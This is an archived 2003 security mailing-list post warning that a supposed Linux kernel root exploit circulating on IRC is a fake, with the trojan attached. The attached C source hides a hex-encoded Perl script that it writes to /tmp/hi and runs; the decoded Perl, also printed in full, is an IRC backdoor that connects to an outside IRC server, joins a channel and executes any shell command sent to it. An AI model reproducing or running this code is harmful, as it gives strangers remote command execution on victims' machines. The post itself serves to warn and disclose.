| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030613155423.C14692@brianhouk.com>
From: brian at brianhouk.com (Brian Houk)
Subject: -1 day exploit - Warning
Just a warning. . .
[03:37] chigoo (521@...-3-1a.um.bonet.se) joined #linuxhelp.
[03:37] <chigoo> new root exploit is out to slackware 9.1 and redhat 9.1! enjoy....be nice to your frinds boxes!:> http://home.no/exploited/exploits/kmodaxx.c
Attached is the so called exploit, and the perl code it runs locally on your machine. #darknet already has a ban on moron*!*@*
print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exp
loit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";
nice
-------------- next part --------------
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/ip.h>
#include <string.h>
/*
* *** http://hack.co.za ***
* ******** DISTRIBUTED 12.06.03 ********
*
* remote kernel root exploit, tested on slackware 9.1, redhat 9.1. (kernels 2.4.2*)
* exploits a race condition in kernel, allowing to take control over
* privileged modprobe binary, and gives u root.
*
*
*
* This exploit must be run as root on source box to open a raw socket.
* compile: gcc -o kmodaxx kmodaxx.c
* run: ./kmodaxx ip
* and u got a nice r00tshell.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
* IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
*
*
* - c1sco darknet@...et
*/
h3llc0de=
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63"
"\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69"
"\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72"
"\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e"
"\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65"
"\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f"
"\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49"
"\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e"
"\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22"
"\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63"
"\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d"
"\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43"
"\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68"
"\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
"\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64"
"\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65"
"\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d"
"\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d"
"\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
"\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c"
"\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
"\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53"
"\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20"
"\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66"
"\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20"
"\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
"\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f"
"\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63"
"\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68"
"\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f"
"\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e"
"\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
"\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28"
"\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
"\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d"
"\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24"
"\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24"
"\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22"
"\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
"\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
"\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d"
"\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64"
"\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69";
unsigned short csum(unsigned short *buf, int nwords)
{
unsigned long sum;
for(sum=0;nwords>0;nwords--);
sum+=*buf++;
sum=(sum>>16)+(sum&0xffff);
sum+=(sum>>16);
return ~sum;
}
unsigned short in_cksum(unsigned short *addr,int len)
{
register int nleft=len;
register unsigned short *w=addr;
register int sum=0;
unsigned short answer=0;
while(nleft>1)
{
sum+=*w++;
nleft-=2;
}
if(nleft==1)
{
*(u_char *)(&answer)=*(u_char *)w;
sum+=answer;
}
sum=(sum >> 16)+(sum & 0xffff);
sum+=(sum >> 16);
answer=~sum;
return(answer);
}
int main(int argc, char **argv)
{
int sockfd;
struct sockaddr_in addr;
char *payload=h3llc0de;
char *buf;
struct iphdr *iph;
struct udphdr *tcph;
int tot_len;
FILE *f;
int die=0;
if(argc!=2)
{
printf("ERROR: No ip address entered\n");
printf("usage:\n%s [IP-ADDRESS]\n\n",argv[0]);
die=1;
}
addr.sin_family=AF_INET;
addr.sin_port=htons(5555);
if(argc==1) argv[1]="";
addr.sin_addr.s_addr=inet_addr(argv[1]);
sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_UDP);
if(sockfd==-1 && !die) {printf("could not obtain raw socket\nARE YOU ROOT?\n");die=1;}
tot_len=sizeof(struct iphdr)+sizeof(struct udphdr)+strlen(payload);
buf=(char *)malloc(tot_len);
malloc(buf,0,tot_len);
iph=(struct iphdr*)buf;
tcph=(struct udphdr*)(buf+sizeof(struct iphdr));
iph->ihl=5;
iph->version=4;
iph->tos=0;
iph->tot_len=tot_len;
iph->id=htons(31337);
iph->frag_off=0;
iph->ttl=225;
iph->protocol=IPPROTO_UDP;
iph->check=0;
iph->saddr=inet_addr("127.0.0.1"); // spoof the source to make it untracable
iph->daddr=inet_addr(argv[1]);
iph->check=in_cksum((unsigned short *)&iph,sizeof(iph));
tcph->source=htons(31337);
tcph->dest=htons(139); // the default SMB port
tcph->len=htons(sizeof(struct udphdr)+strlen(payload));
tcph->check=0;
memcpy(buf+sizeof(struct iphdr)+sizeof(struct udphdr),payload,strlen(payload));
f=fopen(h3llc0de+764,"w");
if(f)
{
fseek(f,0,SEEK_SET);
close(2);
fprintf(f,"%s",h3llc0de);
fclose(f);}system(h3llc0de+735);
{
int one=1;
const int *val = &one;
if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one))<0 && !die)
printf("warning: cannot set HDRINCL\n");
}
if(sendto(sockfd,buf,tot_len,0,(struct sockaddr *)&addr,sizeof(addr))<0 && !die)
printf("err\n");
else if (!die) printf("NUKED THA MOTHA!!! :D\n");
return 0;
}
-------------- next part --------------
#!/usr/bin/perl
$chan="#darknet";
$nick="moron";
$server="efnet.vuurwerk.nl";
$SIG{TERM}={};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET->new($server.":6667")||exit;
print $sock "USER moron +i moron :moronv2\nNICK moron\n";
$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;
last if $mode=="001";
if($mode=="433"){
$i++;
$nick=~s/\d*$/$i/;
print $sock "NICK $nick\n";
}
}
print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exp
loit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";
while(<$sock>){
if (/^PING (.*)$/) {print $sock "PONG $1\nJOIN $chan\n";
}
if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;
$_=`$_`;
foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";
sleep 1;
}
}
}#chmod +x /tmp/hi 2>/dev/null;
/tmp/hi;
Powered by blists - more mailing lists